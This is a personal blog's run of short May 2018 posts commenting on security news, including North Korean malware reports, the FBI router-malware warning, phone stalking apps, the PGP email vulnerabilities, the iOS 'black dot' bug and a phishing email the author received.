Wednesday, May 30, 2018

Big time malware from North Korea can disrupt businesses, maybe hack sites and capture domain names

US Cert has issued a two-part report regarding the Hidden Cobra Rat worm, as well as the Joanap Backdoor Trojan and Branbul Server Message Block Worm,  summary here.
These appear to originate from North Korea and are primarily directed at industrial companies. The description of the Rat worm is exceptionally detailed. Part of the worm includes a powerful password cracker.

I am also aware of instances where a domain, perhaps one with political significance, has been hacked and the domain actually removed from registration by hacking, after replacement with malware botss.  This is likely to be foreign and might be related to North Korea. I’ll report more details when they are available. Trend Micro and Windows Defender have reported detecting this problem.

Friday, May 25, 2018

FBI needs home users to learn router programming skills to defeat determined foreign hackers

The FBI is warning consumers about malware that can attack home routers, especially VPN.
The Boston Globe has a typical story here

Rebooting the router (from the power button, or by disconnecting and reconnecting, which causes most routers to go through the reboot) usually causes installs of any firmware from the cable vendor.  But for this malware, the reboot install may not be sufficient.
The FBI is encouraging home router users to learn how to sign on and update their routers manually, which normally requires shell scripting skills and operating system knowledge.
Comcast, Cox, etc. will soon have comments on this issue.

US Cert has a bulletin on the issue here

Sunday, May 20, 2018

Smart phone tracking and stalking a bigger problem than most people realize

Jennifer Valentino DeVries has a long article in the New York Times Saturday on smart phone stalking and tracking, here 
There seem to be dozens of apps that make this possible, at least a short distance.
The problem seems to occur the most with domestic abuse.
NBC Washington also presented a report May 17. Fox stations have also reported it.  

Saturday, May 19, 2018

Chrome will suppress "secure icon", simply call out insecure sites in September 2018

Google Chrome will suppress it’s “secure” icon in September for sites that are accessed through https (have an SSL certificate) but leave the red “not secure” on for sites that are not.

Marietta Moon writes for Engadget here.
Google really wants to push unsecure content off the web, even when it doesn’t require user signin or collect data, partly because of increasing concerns over “man in the middle” attacks from foreign sources.

Monday, May 14, 2018

New concerns surface concerning vulnerabilities in email encryption standards

Electronic Frontier Foundation has sent out an advisory regarding vulnerabilities in various implementations of PGP encryption on various email platforms. The article is by Erica Portnoy, Danny O’Brien, and Nate Cardozo. 

Some of the vulnerabilities could enable an attacker to access other encrypted emails you have sent.
A lot of the public may not feel that this issue is as important as some others.  Most of us need to encryption standards when we deal with financial institutions to buy new products (like annuities) or go through real estate closings and need to do a lot of Docusigns.

One problem seems to be that some of the vulnerabilities could be activated merely by opening an email with html enabled, even without opening attachments. 

The IT departments of insurance companies and banks will be kept especially busy

Thursday, May 10, 2018

Apple's new "Black Dot of Death": we need a fix quickly

There is a bug in IOS 11 versions on the iPhone that can cause the message app to freeze.  It has to do with Unicode that overfills a buffer associated with a “black dot” emoji ("The Black Dot of Death"). 
On Andrpid it only freezes WhatsApp. On the iPhone if freezes the entire message app.;  It is rather complicated to fix.

It could be a real problem, for example, if you are waiting for a taxi and getting messages from the taxi company.  (I don’t think it affects Uber.)

Typical story is here

It is a little unclear if it freezes the entire phone or just the messages app.  It takes a long time to send.

The demonstrator says it is easy to fix by starting a new messages occurrence.  Fox8 in Cleveland says to use the Siri app. 

The phone can overheat when sending or receiving the message.  Could this become an airline fire hazard?
Apple will surely fix this very soon. 

Wednesday, May 09, 2018

Russian hackers impersonated radical Islam, harassed military spouses online as early as 2015, well before Trump's candidacy and election

There was an alarming historical story on AP by Raphael Satter, about how Russian hackers had impersonated ISIS with text messages or other social media contact with military spouses, at least back in 2015. 

At least one of the spouses was part of Military Partners, an association of partners of LGBT service members, active since the repeal of DADT and also since Obergefell.

But the attack appears to have been part of a Russian troll attempt to spread confusion and dissension, even well before the 2016 elections and even before Donald Trump had announced his candidacy. 
This story bears watching.

Tuesday, May 08, 2018

Phishing emails asking for payment for fictitious loans

Here’s a new one.  I don’t recall getting an email before about a loan I didn’t make.

But I got an email from “” claiming I owe a $19 payment to “accounts receivables”.  There was an attached pdf which I didn’t open. The “.co” refers to Colombia, so that’s suspicious. 

I’ll probably pull credit reports in a few days to make sure there is nothing going on. 

I generally open “suspicious” emails only on the iPhone (apple operating systems don’t seem to be as vulnerable) and don’t open the attachments at all.

“Elastic” does appear, from superficial checking, to be a real company that makes loans. I doubt this email came from them. But I did sent this on to Webroot and to Trend Micro to check further. 
I should also mention that I've gotten a few US mail letter offering $100,000 lines of credit (one of them was $500,000).  I've ignored them.  They've never shown up on a credit report. 

Friday, May 04, 2018

Twitter's little password flip; what about Facebook employees and your profiles?

NBC reports both praise and scorn for Twitter:  displeasure of the fact that uncleared workers could access unencrypted passwords at the company, put pleased that the company disclosed it.
I changed my own on a Windows 10 computer, and it seemed that it started working automatically on my phone.

In IT workplaces, security teams started to implement the idea of “separation of functions” among employees starting in the late 1980s in mainframe environments.  Programmers normally did not have the right to update production files but users did. But the maturity to respect security protocols, which protect employees, was slow to develop with many people (apparently including Hillary Clinton).
There is an issue of Facebook employees being able to access ordinary user private profiles, Wall Street Journal story.